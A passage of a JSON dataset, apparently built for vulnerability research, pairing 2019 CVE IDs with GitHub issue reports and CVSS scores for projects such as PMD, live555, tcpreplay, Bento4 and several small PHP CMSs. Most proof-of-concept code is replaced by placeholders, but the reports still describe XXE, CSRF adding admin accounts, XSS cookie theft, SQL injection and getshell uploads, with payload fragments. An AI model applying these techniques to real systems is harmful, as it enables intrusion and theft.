        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7722",
        "Issue_Url_old": "https://github.com/pmd/pmd/issues/1650",
        "Issue_Url_new": "https://github.com/pmd/pmd/issues/1650",
        "Repo_new": "pmd/pmd",
        "Issue_Created_At": "2019-02-11T11:58:33Z",
        "description": "core] Advisory XXE attack on ruleset parsing. This issue is for future reference. As part of an unrelated security concern discussion regarding a possible remote code execution (which was discarded as impossible) on a [separate issue URLTAG , I found that our XML parsing wasn't hardened, allowing for XXE attacks. When PMD is run, the ruleset XMLs were parsed with the default Java parser settings, which allowed an attacker to perform an XXE attack. Rulesets can be either local files, or accessed through the network over http / https. So, depending on the context, this attack could require physical access to the machine, or be achieved through a man in the middle attack. The XXE attack can be used to perform information disclosure on the developer's machine, CI servers or other infrastructure running PMD; as well as denial of service attacks and request forgery. All PMD versions up to PMD NUMBERTAG are vulnerable. A fix was produced in URLTAG following OWASP XXE Prevention cheatsheet URLTAG , making all PMD NUMBERTAG releases and later safe.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-7732",
        "Issue_Url_old": "https://github.com/rgaufman/live555/issues/20",
        "Issue_Url_new": "https://github.com/rgaufman/live555/issues/20",
        "Repo_new": "rgaufman/live555",
        "Issue_Created_At": "2019-02-11T04:57:50Z",
        "description": "There is a memory leak in function APITAG which can cause a APITAG In the lastest version of live NUMBERTAG there is a memory leak issue. The attacker can make the server crash with this issue. when parse the setup packet with many username fileds, the value of username will be duplicated many times at NUMBERTAG The pointers of username value can't be freed ever, except for the last one. The fileds realm nonce uri response have the same problem. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7733",
        "Issue_Url_old": "https://github.com/rgaufman/live555/issues/21",
        "Issue_Url_new": "https://github.com/rgaufman/live555/issues/21",
        "Repo_new": "rgaufman/live555",
        "Issue_Created_At": "2019-02-11T05:37:29Z",
        "description": "There is a buffer overflow which can lead to dos in live NUMBERTAG When parse the request packet in function APITAG the code don't check the APITAG , and use it in memmove. Finally cause the buff overflow. ERRORTAG There is a APITAG check, but it only assigns APITAG to false. This can't avoid the memmove . CODETAG I can make the server crash with a simple packet. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7737",
        "Issue_Url_old": "https://github.com/Verytops/verydows/issues/10",
        "Issue_Url_new": "https://github.com/verytops/verydows/issues/10",
        "Repo_new": "verytops/verydows",
        "Issue_Created_At": "2019-02-11T15:44:47Z",
        "description": "CSRF Vulnerability that can add admin user. A CSRF vulnerability was found in this cms. Logged in administrator user may add another administrator account by clicking following POC APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7738",
        "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/3",
        "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/3",
        "Repo_new": "cooltey/c.p.sub",
        "Issue_Created_At": "2018-09-20T16:50:57Z",
        "description": "CSRF Delete an announcement article arbitrarily. Hey , APITAG In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the \"get\" parameter value is very dangerous. List\uff1a URLTAG Poc Payload\uff1a > GET APITAG HTTP NUMBERTAG Host: your_website > Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG > Accept Encoding: gzip, deflate > Accept Language: zh TW,zh; APITAG US; APITAG > Cookie: APITAG APITAG wp settings NUMBERTAG mfold NUMBERTAG Do; wp settings time NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG > Connection: close FILETAG Poc Payload\uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7753",
        "Issue_Url_old": "https://github.com/Verytops/verydows/issues/11",
        "Issue_Url_new": "https://github.com/verytops/verydows/issues/11",
        "Repo_new": "verytops/verydows",
        "Issue_Created_At": "2019-02-12T09:43:29Z",
        "description": "XSS vulnerability which can steal admin's cookies or more!. In page APITAG where users' visiting are logged, we can modify the POST parameter \"referrer\" which will be shown without filtering to administrator. As a result, hacker can construct a XSS payload to steal admin's cookies! payload: FILETAG result: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8334",
        "Issue_Url_old": "https://github.com/gongfuxiang/schoolcms/issues/1",
        "Issue_Url_new": "https://github.com/gongfuxiang/schoolcms/issues/1",
        "Repo_new": "gongfuxiang/schoolcms",
        "Issue_Created_At": "2019-02-13T07:43:01Z",
        "description": "There is three xss vulnerability that can get the administrator cookie.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8336",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5423",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5423",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2019-03-04T19:17:00Z",
        "description": "TBD.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-8347",
        "Issue_Url_old": "https://github.com/source-trace/beescms/issues/4",
        "Issue_Url_new": "https://github.com/source-trace/beescms/issues/4",
        "Repo_new": "source-trace/beescms",
        "Issue_Created_At": "2019-02-14T10:56:52Z",
        "description": "There is a CSRF vulnerability that can add arbitrary VIP accounts. After the administrator logged in, open the following one page. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG URLTAG URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8363",
        "Issue_Url_old": "https://github.com/Verytops/verydows/issues/12",
        "Issue_Url_new": "https://github.com/verytops/verydows/issues/12",
        "Repo_new": "verytops/verydows",
        "Issue_Created_At": "2019-02-14T01:28:45Z",
        "description": "Reflected Cross Site FILETAG . Environment installed from verydows master In page APITAG the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse Payload used: APITAG APITAG Affected URL: URLTAG Navigate to the Affected URL, Payload would be triggered. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8376",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/537",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/537",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2019-02-12T09:07:37Z",
        "description": "NULL pointer dereference in APITAG . Description we observed a NULL pointer dereference occured in function get_layer NUMBERTAG located at get.c APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-8377",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/536",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/536",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2019-02-07T06:58:32Z",
        "description": "NULL pointer dereference APITAG Description we observed a NULL pointer dereference occured in function APITAG located at APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-8378",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/363",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/363",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-29T07:09:12Z",
        "description": "A heap buffer overflow occured in function APITAG Description we observed a heap buffer overflow occured in function APITAG located in APITAG APITAG same be triggered by sending a crafted file to the podofoimpose binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Degub ASAN REPORT ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8380",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/366",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/366",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-02-07T06:32:20Z",
        "description": "NULL POINTER DEREFERENCE in APITAG Description we observed a NULL pointer dereference occured in APITAG located in APITAG APITAG same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8381",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/538",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/538",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2019-02-12T17:10:10Z",
        "description": "Invalid memory access in APITAG . Description we observed that there is an Invalid memory access at APITAG in APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-8393",
        "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/4",
        "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/4",
        "Repo_new": "fantasticlbp/hotels_server",
        "Issue_Created_At": "2019-02-17T05:50:57Z",
        "description": "APITAG through NUMBERTAG has SQL Injection via the API.. In PATHTAG It will receive a parameter called \"telephone\" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection. We can use SQLMAP to test this vulnerability: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8408",
        "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/51",
        "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/51",
        "Repo_new": "self-evident/onefilecms",
        "Issue_Created_At": "2019-01-29T06:16:32Z",
        "description": "onefilecms.php in APITAG can be illegally modified. APITAG FILETAG by username/password , then click APITAG master'. FILETAG APITAG click APITAG FILETAG APITAG can see that there is no permission to edit APITAG And then click 'copy'. FILETAG APITAG to do ,and click 'copy' again. FILETAG APITAG you can see ,the file is ready for editing and saving. As following picture shows. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-8411",
        "Issue_Url_old": "https://github.com/615/VulnPoC/issues/1",
        "Issue_Url_new": "https://github.com/615/vulnpoc/issues/1",
        "Repo_new": "615/vulnpoc",
        "Issue_Created_At": "2019-01-09T09:41:42Z",
        "description": "zzcms NUMBERTAG data NUMBERTAG link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG There is unlink($fp) to delete any file by controlloing the value of $_GET FILETAG so we can delete APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8419",
        "Issue_Url_old": "https://github.com/tamlok/vnote/issues/564",
        "Issue_Url_new": "https://github.com/vnotex/vnote/issues/564",
        "Repo_new": "vnotex/vnote",
        "Issue_Created_At": "2019-01-05T08:37:36Z",
        "description": "We found a stored xss vulnerability in vnote. Hello friend\uff0cwe are farmsec security team\uff0cwe found a stored xss vulnerability in vnote\uff1a OS Version : Linux APITAG Version APITAG NUMBERTAG Symptoms : APITAG app does not filter specific html tags\uff0cas\uff1a APITAG APITAG APITAG NUMBERTAG An attacker can execute a javascript script by using a malicious html tag. FILETAG How to Repro : APITAG vnote for linux URLTAG FILETAG APITAG New Note Fill in the notebook name FILETAG Click OK. APITAG folder FILETAG Click OK. APITAG text note FILETAG APITAG in the xss vulnerability test payload payload: APITAG APITAG note Enter Ctrl+T FILETAG The code is executed in the browser",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8421",
        "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/5",
        "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/5",
        "Repo_new": "bagesoft/bagecms",
        "Issue_Created_At": "2019-02-13T12:50:34Z",
        "description": "SQL injection vulnerability can inject user data. URL\uff1a FILETAG There are two parameters in the file that may be injected. Controller at PATHTAG FILETAG FILETAG FILETAG There is no parameter filtering here, and these parameters are brought into the database for query, then there may be a SQL injection vulnerability here. Find the location of the vulnerability url\uff1a URLTAG FILETAG Impact parameters: Title How to affect the parameter title, click on the query, and view the request package through the burst suite. Vulnerability POC Request Package: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,zh CN; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG DNT NUMBERTAG Recurring steps NUMBERTAG First enter the website background management page NUMBERTAG Go to the content, content management page. FILETAG There is a query button at the top right to query NUMBERTAG burp suite capture packet analysis. FILETAG Inject test on the tittlealias Use sqlmap to verify that there is an injection point. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-8433",
        "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/6",
        "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/6",
        "Repo_new": "jetiben/jtbc",
        "Issue_Created_At": "2019-01-07T08:16:42Z",
        "description": "Bug: file upload Vulnerability. There is an file upload vulnerability in your latest version of the CMS NUMBERTAG In URLTAG \uff0cupload the file FILETAG document content \uff1a FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG upload FILETAG exp: FILETAG APITAG Fi NUMBERTAG erify the file name suffix and limit the uploading (php, jsp, aspx) scripts NUMBERTAG Set the upload whitelist, only allow uploading whitelist (jpg, png, gif) and other file types NUMBERTAG Set file storage directory permissions, prohibit file upload directory for script parsing.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8435",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/3",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/3",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2019-01-09T05:50:37Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG In the PATHTAG FILETAG APITAG To Reproduce: FILETAG FILETAG Fi NUMBERTAG Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on NUMBERTAG erify the data type and verify its format, length, scope, and content NUMBERTAG Not only need to be verified on the client side but also on the server side NUMBERTAG The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-8437",
        "Issue_Url_old": "https://github.com/beyond7176/njiandan-cms/issues/1",
        "Issue_Url_new": "https://github.com/beyond7176/njiandan-cms/issues/1",
        "Repo_new": "beyond7176/njiandan-cms",
        "Issue_Created_At": "2019-01-09T10:01:18Z",
        "description": "BUG: CSRF vulnerability. There is an CSRF vulnerability in your CMS Log in as an admin Inducing the admin to click on the link success add an administrator. POC CODETAG FILETAG APITAG FI NUMBERTAG erify the HTTP Referer field NUMBERTAG Add a token to the request address and verify (the token is not placed in the cookie, placed in the http request parameter, and the server verifies it NUMBERTAG Add the token to the http header attribute to prevent the token from appearing in the browser and being leaked.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8438",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/61",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/61",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2019-01-10T02:43:25Z",
        "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the first textbox\uff0cand submit\u3002 APITAG APITAG APITAG alert NUMBERTAG APITAG FILETAG And then Stored XSS triggered",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-8439",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/62",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/62",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2019-01-10T03:09:01Z",
        "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the second textbox\uff0cand submit\u3002 payload\uff1asite_domain= FILETAG \" onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the second textbook \uff0cthen Stored XSS triggered",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-8440",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/63",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/63",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2019-01-10T03:16:54Z",
        "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the third textbox\uff0cand submit\u3002 APITAG onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the third textbook \uff0cthen Stored XSS triggered",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-8902",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/56",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/56",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-02-18T11:14:06Z",
        "description": "A CSRF vulnerability exists in iCMS NUMBERTAG When the users login in, he can add an link URL in the article. Then the other users open the link URL will cause CSRF. POC NUMBERTAG html delete users' articles ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2019-8908",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/3",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/3",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-02-18T07:33:00Z",
        "description": "An issue was discovered in APITAG there is an Backstage editor getshell Vulnerability. The attacker opens Setting Mailbox configuration Registration email template,upload the image through the editor, burbsuite capture the package and change the Suffix, you can upload any file. FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8909",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/6",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/6",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-02-18T11:01:34Z",
        "description": "The background verification code size can be controlled to cause a denial of service attack.. APITAG click to view the verification code image address APITAG width and height in the url APITAG burpsuite to fetch data and see the size of the returned package APITAG modifying the length and width values and seeing the size of the returned package APITAG the above test, we know that the vulnerability exists. If we send a NUMBERTAG packet to the server and the server takes NUMBERTAG s to process, then if we send NUMBERTAG packets NUMBERTAG s That is, the server takes NUMBERTAG s to process. When we send NUMBERTAG such packets (of course, you should never throw them with NUMBERTAG packets. Generally speaking NUMBERTAG test results can lead to website crashes.) FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8910",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/5",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/5",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-02-18T10:29:15Z",
        "description": "Csrf + Xss combination Can be obtained administrator cookie. Place of backstage set up website information exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the site information is automatically changed. There is still an xss in the place of the website statistics code. FILETAG We can write an xss first, and then construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the administrator visits the homepage of the website, he can get him Cookie CSRF Exp: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8919",
        "Issue_Url_old": "https://github.com/haiwen/seadroid/issues/789",
        "Issue_Url_new": "https://github.com/haiwen/seadroid/issues/789",
        "Repo_new": "haiwen/seadroid",
        "Issue_Created_At": "2019-02-18T13:09:10Z",
        "description": "IV should be randomness and unpredictable. When using client side encryption, for one encrypted library, the IV is stored and the client program always uses this one IV to encrypt and decrypt different files. IV reused is unsafe and should not be used, the IV should be randomness and unpredictable. ( CVETAG : CVETAG These are Debug details for three different files when decrypting them in the client APITAG side: File1: Cipher MENTIONTAG APITAG File2: Cipher MENTIONTAG APITAG File3: Cipher MENTIONTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-8939",
        "Issue_Url_old": "https://github.com/Tautulli/Tautulli-Issues/issues/161",
        "Issue_Url_new": "https://github.com/tautulli/tautulli-issues/issues/161",
        "Repo_new": "tautulli/tautulli-issues",
        "Issue_Created_At": "2019-02-19T15:15:29Z",
        "description": "Insufficient username filtering in FILETAG allows XSS and data exfiltration. Version NUMBERTAG What you did? I changed my Plex username to APITAG . What happened? Tautulli does filter APITAG and when someone visits the History page, it's executed in the context of whichever user is logged in, probably the server admin. Lines NUMBERTAG are vulnerable: URLTAG Here we can see how it is reflected: CODETAG What you expected? I didn't expect my friend's Plex server to leak a bunch of information at me. How can we reproduce your issue? Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with APITAG Visit the Tautulli History page.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8944",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5315",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5315",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-02-19T23:08:37Z",
        "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-8944",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5314",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5314",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-02-19T23:00:07Z",
        "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
